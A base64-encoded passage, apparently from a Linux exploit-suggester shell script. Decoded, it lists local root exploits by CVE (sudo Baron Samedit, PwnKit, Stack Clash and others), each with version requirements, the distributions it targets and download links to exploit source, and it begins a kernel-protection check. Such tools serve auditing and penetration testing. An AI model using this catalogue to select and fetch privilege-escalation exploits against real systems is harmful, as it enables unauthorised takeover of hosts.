Wx5c2lzLXVybDogaHR0cHM6Ly9jLXNraWxscy5ibG9nc3BvdC5jb20vMjAxNi8wNi9sZXRzLWZlZWQtYXR0YWNrZXItaW5wdXQtdG8tc2gtYy10by1zZWUuaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vc3RlYWx0aC90cm91Ymxlc2hvb3Rlci9yYXcvbWFzdGVyL3N0cmFpZ2h0LXNob290ZXIuYwpleHBsb2l0LWRiOgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01NDI1XSR7dHh0cnN0fSB0b21jYXQtUkgtcm9vdC5zaApSZXFzOiBwa2c9dG9tY2F0ClRhZ3M6IFJIRUw9NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9Ub21jYXQtUmVkSGF0LVBrZ3MtUm9vdC1Qcml2RXNjLUV4cGxvaXQtQ1ZFLTIwMTYtNTQyNS5odG1sCnNyYy11cmw6IGh0dHA6Ly9sZWdhbGhhY2tlcnMuY29tL2V4cGxvaXRzL3RvbWNhdC1SSC1yb290LnNoCmV4cGxvaXQtZGI6IDQwNDg4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFmZmVjdHMgb25seSBSZWRIYXQtYmFzZWQgZGlzdHJvcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi02NjYzLENWRS0yMDE2LTY2NjR8Q1ZFLTIwMTYtNjY2Ml0ke3R4dHJzdH0gbXlzcWwtZXhwbG9pdC1jaGFpbgpSZXFzOiBwa2c9bXlzcWwtc2VydmVyfG1hcmlhZGItc2VydmVyLHZlcjw1LjUuNTIKVGFnczogdWJ1bnR1PTE2LjA0LjEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL015U1FMLU1hcmlhLVBlcmNvbmEtUHJpdkVzY1JhY2UtQ1ZFLTIwMTYtNjY2My01NjE2LUV4cGxvaXQuaHRtbApzcmMtdXJsOiBodHRwOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi02NjYzL215c3FsLXByaXZlc2MtcmFjZS5jCmV4cGxvaXQtZGI6IDQwNjc4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsc28gTWFyaWFEQiB2ZXI8MTAuMS4xOCBhbmQgdmVyPDEwLjAuMjggYWZmZWN0ZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtOTU2Nl0ke3R4dHJzdH0gbmFnaW9zLXJvb3QtcHJpdmVzYwpSZXFzOiBwa2c9bmFnaW9zLHZlcjw0LjIuNApUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9sZWdhbGhhY2tlcnMuY29tL2Fkdmlzb3JpZXMvTmFnaW9zLUV4cGxvaXQtUm9vdC1Qcml2RXNjLUNWRS0yMDE2LTk1NjYuaHRtbApzcmMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvQ1ZFLTIwMTYtOTU2Ni9uYWdpb3Mtcm9vdC1wcml2ZXNjLnNoCmV4cGxvaXQtZGI6IDQwOTIxCmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsbG93cyBwcml2IGVzY2FsYXRpb24gZnJvbSBuYWdpb3MgdXNlciBvciBuYWdpb3MgZ3JvdXAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMDM1OF0ke3R4dHJzdH0gbnRmcy0zZy1tb2Rwcm9iZQpSZXFzOiBwa2c9bnRmcy0zZyx2ZXI8MjAxNy40ClRhZ3M6IHVidW50dT0xNi4wNHtudGZzLTNnOjIwMTUuMy4xNEFSLjEtMWJ1aWxkMX0sZGViaWFuPTcuMHtudGZzLTNnOjIwMTIuMS4xNUFSLjUtMi4xK2RlYjd1Mn0sZGViaWFuPTguMHtudGZzLTNnOjIwMTQuMi4xNUFSLjItMStkZWI4dTJ9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2J1Z3MuY2hyb21pdW0ub3JnL3AvcHJvamVjdC16ZXJvL2lzc3Vlcy9kZXRhaWw/aWQ9MTA3MgpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80MTM1Ni56aXAKZXhwbG9pdC1kYjogNDEzNTYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuIExpbnV4IGhlYWRlcnMgbXVzdCBiZSBpbnN0YWxsZWQuIFN5c3RlbSBtdXN0IGhhdmUgYXQgbGVhc3QgdHdvIENQVSBjb3Jlcy4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTg5OV0ke3R4dHJzdH0gcy1uYWlsLXByaXZnZXQKUmVxczogcGtnPXMtbmFpbCx2ZXI8MTQuOC4xNgpUYWdzOiB1YnVudHU9MTYuMDQsbWFuamFybz0xNi4xMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcKc3JjLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcvMQpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy01ODk5L2V4cGxvaXQuc2gKYXV0aG9yOiB3YXBpZmxhcGkgKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBCcmVuZGFuIENvbGVzIChhdXRob3Igb2YgZXhwbG9pdCB1cGRhdGUgYXQgJ2V4dC11cmwnKQpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2N10ke3R4dHJzdH0gU3Vkb2VyLXRvLXJvb3QKUmVxczogcGtnPXN1ZG8sdmVyPD0xLjguMjAsY21kOlsgLWYgL3Vzci9zYmluL2dldGVuZm9yY2UgXQpUYWdzOiBSSEVMPTd7c3VkbzoxLjguNnA3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc3Vkby53cy9hbGVydHMvbGludXhfdHR5Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA1LzMwL2N2ZS0yMDE3LTEwMDAzNjcvbGludXhfc3Vkb19jdmUtMjAxNy0xMDAwMzY3LmMKZXhwbG9pdC1kYjogNDIxODMKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IE5lZWRzIHRvIGJlIHN1ZG9lci4gV29ya3Mgb25seSBvbiBTRUxpbnV4IGVuYWJsZWQgc3lzdGVtcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzY3XSR7dHh0cnN0fSBzdWRvcHduClJlcXM6IHBrZz1zdWRvLHZlcjw9MS44LjIwLGNtZDpbIC1mIC91c3Ivc2Jpbi9nZXRlbmZvcmNlIF0KVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnN1ZG8ud3MvYWxlcnRzL2xpbnV4X3R0eS5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jMGQzejNyMC9zdWRvLUNWRS0yMDE3LTEwMDAzNjcvbWFzdGVyL3N1ZG9wd24uYwpleHBsb2l0LWRiOgphdXRob3I6IGMwZDN6M3IwCkNvbW1lbnRzOiBOZWVkcyB0byBiZSBzdWRvZXIuIFdvcmtzIG9ubHkgb24gU0VMaW51eCBlbmFibGVkIHN5c3RlbXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcwXSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDYvMTkvc3RhY2stY2xhc2gvc3RhY2stY2xhc2gudHh0CnNyYy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9saW51eF9sZHNvX2h3Y2FwLmMKZXhwbG9pdC1kYjogNDIyNzQKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IFVzZXMgIlN0YWNrIENsYXNoIiB0ZWNobmlxdWUsIHdvcmtzIGFnYWluc3QgbW9zdCBTVUlELXJvb3QgYmluYXJpZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcxXSR7dHh0cnN0fSBsaW51eF9sZHNvX2R5bmFtaWMKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczogZGViaWFuPTl8MTAsdWJ1bnR1PTE0LjA0LjV8MTYuMDQuMnwxNy4wNCxmZWRvcmE9MjN8MjR8MjUKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29fZHluYW1pYy5jCmV4cGxvaXQtZGI6IDQyMjc2CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOiBVc2VzICJTdGFjayBDbGFzaCIgdGVjaG5pcXVlLCB3b3JrcyBhZ2FpbnN0IG1vc3QgU1VJRC1yb290IFBJRXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzc5XSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwXzY0ClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2XzY0ClRhZ3M6IGRlYmlhbj03Ljd8OC41fDkuMCx1YnVudHU9MTQuMDQuMnwxNi4wNC4yfDE3LjA0LGZlZG9yYT0yMnwyNSxjZW50b3M9Ny4zLjE2MTEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29faHdjYXBfNjQuYwpleHBsb2l0LWRiOiA0MjI3NQphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZSwgd29ya3MgYWdhaW5zdCBtb3N0IFNVSUQtcm9vdCBiaW5hcmllcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzcwLENWRS0yMDE3LTEwMDAzNzFdJHt0eHRyc3R9IGxpbnV4X29mZnNldDJsaWIKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X29mZnNldDJsaWIuYwpleHBsb2l0LWRiOiA0MjI3MwphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDAwMDAxXSR7dHh0cnN0fSBSYXRpb25hbExvdmUKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjwyLjI3LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLHg4Nl82NApUYWdzOiBkZWJpYW49OXtsaWJjNjoyLjI0LTExK2RlYjl1MX0sdWJ1bnR1PTE2LjA0LjN7bGliYzY6Mi4yMy0wdWJ1bnR1OX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTcvTGliY1JlYWxwYXRoQnVmZmVyVW5kZXJmbG93LwpzcmMtdXJsOiBodHRwczovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE3L0xpYmNSZWFscGF0aEJ1ZmZlclVuZGVyZmxvdy9SYXRpb25hbExvdmUuYwpDb21tZW50czoga2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9MSByZXF1aXJlZApiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE4LTEwMDAwMDEvUmF0aW9uYWxMb3ZlCmV4cGxvaXQtZGI6IDQzNzc1CmF1dGhvcjogaGFsZmRvZwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDkwMF0ke3R4dHJzdH0gdnBuY19wcml2ZXNjLnB5ClJlcXM6IHBrZz1uZXR3b3JrbWFuYWdlci12cG5jfG5ldHdvcmstbWFuYWdlci12cG5jLHZlcjwxLjIuNgpUYWdzOiB1YnVudHU9MTYuMDR7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4xLjkzLTF9LGRlYmlhbj05LjB7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4yLjQtNH0sbWFuamFybz0xNwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9wdWxzZXNlY3VyaXR5LmNvLm56L2Fkdmlzb3JpZXMvTk0tVlBOQy1Qcml2ZXNjCnNyYy11cmw6IGh0dHBzOi8vYnVnemlsbGEubm92ZWxsLmNvbS9hdHRhY2htZW50LmNnaT9pZD03NzkxMTAKZXhwbG9pdC1kYjogNDUzMTMKYXV0aG9yOiBEZW5pcyBBbmR6YWtvdmljCkNvbW1lbnRzOiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xNDY2NV0ke3R4dHJzdH0gcmFwdG9yX3hvcmd5ClJlcXM6IHBrZz14b3JnLXgxMS1zZXJ2ZXItWG9yZyxjbWQ6WyAtdSAvdXNyL2Jpbi9Yb3JnIF0KVGFnczogY2VudG9zPTcuNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc2VjdXJlcGF0dGVybnMuY29tLzIwMTgvMTAvY3ZlLTIwMTgtMTQ2NjUteG9yZy14LXNlcnZlci5odG1sCmV4cGxvaXQtZGI6IDQ1OTIyCmF1dGhvcjogcmFwdG9yCkNvbW1lbnRzOiBYLk9yZyBTZXJ2ZXIgYmVmb3JlIDEuMjAuMyBpcyB2dWxuZXJhYmxlLiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS03MzA0XSR7dHh0cnN0fSBkaXJ0eV9zb2NrClJlcXM6IHBrZz1zbmFwZCx2ZXI8Mi4zNyxjbWQ6WyAtUyAvcnVuL3NuYXBkLnNvY2tldCBdClRhZ3M6IHVidW50dT0xOC4xMCxtaW50PTE5ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2luaXRibG9nLmNvbS8yMDE5L2RpcnR5LXNvY2svCmV4cGxvaXQtZGI6IDQ2MzYxCmV4cGxvaXQtZGI6IDQ2MzYyCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2svYXJjaGl2ZS9tYXN0ZXIuemlwCmF1dGhvcjogSW5pdFN0cmluZwpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTAxNDldJHt0eHRyc3R9IHJhcHRvcl9leGltX3dpegpSZXFzOiBwa2c9ZXhpbXxleGltNCx2ZXI+PTQuODcsdmVyPD00LjkxClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTkvMDYvMDUvY3ZlLTIwMTktMTAxNDkvcmV0dXJuLXdpemFyZC1yY2UtZXhpbS50eHQKZXhwbG9pdC1kYjogNDY5OTYKYXV0aG9yOiByYXB0b3IKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTIxODFdJHt0eHRyc3R9IFNlcnYtVSBGVFAgU2VydmVyClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvU2Vydi1VL1NlcnYtVSBdClRhZ3M6IGRlYmlhbj05ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cudmFzdGFydC5kZXYvMjAxOS8wNi9jdmUtMjAxOS0xMjE4MS1zZXJ2LXUtZXhwbG9pdC13cml0ZXVwLmh0bWwKZXhwbG9pdC1kYjogNDcwMDkKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2d1eXdoYXRhZ3V5L0NWRS0yMDE5LTEyMTgxL21hc3Rlci9zZXJ2dS1wZS1jdmUtMjAxOS0xMjE4MS5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMvbG9jYWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEyMTgxL1NVcm9vdAphdXRob3I6IEd1eSBMZXZpbiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkNvbW1lbnRzOiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyB1c2VzIGJhc2ggZXhlYyB0ZWNobmlxdWUsIHJhdGhlciB0aGFuIGNvbXBpbGluZyB3aXRoIGdjYy4KRU9GCikKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xODg2Ml0ke3R4dHJzdH0gR05VIE1haWx1dGlscyAyLjAgPD0gMy43IG1haWRhZyB1cmwgbG9jYWwgcm9vdCAoQ1ZFLTIwMTktMTg4NjIpClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvc2Jpbi9tYWlkYWcgXQpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm1pa2UtZ3VhbHRpZXJpLmNvbS9wb3N0cy9maW5kaW5nLWEtZGVjYWRlLW9sZC1mbGF3LWluLWdudS1tYWlsdXRpbHMKZXh0LXVybDogaHR0cHM6Ly9naXRodWIuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9yYXcvbWFzdGVyL0NWRS0yMDE5LTE4ODYyL2V4cGxvaXQuY3Jvbi5zaApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL3Jhdy9tYXN0ZXIvQ1ZFLTIwMTktMTg4NjIvZXhwbG9pdC5sZHByZWxvYWQuc2gKYXV0aG9yOiBiY29sZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTg2MzRdJHt0eHRyc3R9IHN1ZG8gcHdmZWVkYmFjawpSZXFzOiBwa2c9c3Vkbyx2ZXI8MS44LjMxClRhZ3M6IG1pbnQ9MTkKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZHlsYW5rYXR6LmNvbS9BbmFseXNpcy1vZi1DVkUtMjAxOS0xODYzNC8Kc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL3NhbGVlbXJhc2hpZC9zdWRvLWN2ZS0yMDE5LTE4NjM0L3Jhdy9tYXN0ZXIvZXhwbG9pdC5jCmF1dGhvcjogc2FsZWVtcmFzaGlkCkNvbW1lbnRzOiBzdWRvIGNvbmZpZ3VyYXRpb24gcmVxdWlyZXMgcHdmZWVkYmFjayB0byBiZSBlbmFibGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMC05NDcwXSR7dHh0cnN0fSBXaW5nIEZUUCBTZXJ2ZXIgPD0gNi4yLjUgTFBFClJlcXM6IGNtZDpbIC14IC9ldGMvaW5pdC5kL3dmdHBzZXJ2ZXIgXQpUYWdzOiB1YnVudHU9MTgKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAucGhwCnNyYy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAuc2gKZXhwbG9pdC1kYjogNDgxNTQKYXV0aG9yOiBDYXJ5IENvb3BlcgpDb21tZW50czogUmVxdWlyZXMgYW4gYWRtaW5pc3RyYXRvciB0byBsb2dpbiB2aWEgdGhlIHdlYiBpbnRlcmZhY2UuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdApSZXFzOiBwa2c9c3Vkbyx2ZXI8MS45LjVwMgpUYWdzOiBtaW50PTE5LHVidW50dT0xOHwyMCwgZGViaWFuPTEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL2JsYXN0eS9DVkUtMjAyMS0zMTU2L3ppcC9tYWluCmF1dGhvcjogYmxhc3R5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdCAyClJlcXM6IHBrZz1zdWRvLHZlcjwxLjkuNXAyClRhZ3M6IGNlbnRvcz02fDd8OCx1YnVudHU9MTR8MTZ8MTd8MTh8MTl8MjAsIGRlYmlhbj05fDEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL3dvcmF3aXQvQ1ZFLTIwMjEtMzE1Ni96aXAvbWFpbgphdXRob3I6IHdvcmF3aXQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTYxOF0ke3R4dHJzdH0gc2V0dWlkIHNjcmVlbiB2NC41LjAgTFBFClJlcXM6IHBrZz1zY3JlZW4sdmVyPT00LjUuMApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNy9xMS8xODQKZXhwbG9pdC1kYjogaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDExNTQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtNDAzNF0ke3R4dHJzdH0gUHduS2l0ClJlcXM6IHBrZz1wb2xraXR8cG9saWN5a2l0LTEsdmVyPD0wLjEwNS0zMQpUYWdzOiB1YnVudHU9MTB8MTF8MTJ8MTN8MTR8MTV8MTZ8MTd8MTh8MTl8MjB8MjEsZGViaWFuPTd8OHw5fDEwfDExLGZlZG9yYSxtYW5qYXJvClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjIvMDEvMjUvY3ZlLTIwMjEtNDAzNC9wd25raXQudHh0CnNyYy11cmw6IGh0dHBzOi8vY29kZWxvYWQuZ2l0aHViLmNvbS9iZXJkYXYvQ1ZFLTIwMjEtNDAzNC96aXAvbWFpbgphdXRob3I6IGJlcmRhdgpFT0YKKQoKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyMgc2VjdXJpdHkgcmVsYXRlZCBIVy9rZXJuZWwgZmVhdHVyZXMKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKbj0wCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpzZWN0aW9uOiBNYWlubGluZSBrZXJuZWwgcHJvdGVjdGlvbiBtZWNoYW5pc21zOgpFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogS2VybmVsIFBhZ2UgVGFibGUgSXNvbGF0aW9uIChQVEkpIHN1cHBvcnQKYXZhaWxhYmxlOiB2ZXI+PTQuMTUKZW5hYmxlZDogY21kOmdyZXAgLUVxaSAnXHNwdGknIC9wcm9jL2NwdWluZm8KYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9wdGkubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEdDQyBzdGFjayBwcm90ZWN0b3Igc3VwcG9ydAphd